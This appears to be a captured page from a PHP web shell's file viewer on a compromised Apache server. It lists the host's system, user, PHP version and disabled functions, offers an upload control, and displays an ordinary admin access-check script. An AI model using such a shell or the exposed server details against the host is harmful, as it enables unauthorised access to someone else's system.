HEX
Server: Apache/2.4.25 (Debian)
System: Linux server17 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
User: web37 (1062)
PHP: 7.4.30
Disabled: show_source, highlight_file, apache_child_terminate, apache_get_modules, apache_note, apache_setenv, virtual, dl, disk_total_space, posix_getpwnam, posix_getpwuid, posix_mkfifo, posix_mknod, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_nice, openlog, syslog, pfsockopen
$ pwd: /var/www/web37/htdocs/09005/admin/
Upload Files
File: /var/www/web37/htdocs/09005/admin/checkaccess.php
<?php

// Check only when inside the admin area
$logged = false;
if (basename($_SERVER['PHP_SELF']) != "login.php") {
    $login = new imPrivateArea();
    if ($login->checkAccess("admin/" . basename($_SERVER['PHP_SELF'])) !== 0) {
        if (isset($_SERVER['HTTP_REFERER']) && basename($_SERVER['HTTP_REFERER']) == "login.php") {
            header("Location: login.php?error");
            exit;
        } else {
            header("Location: login.php");
            exit;
        }
    } else {
        $logged = true;
    }
}

// End of file checkaccess.php
@ Telegram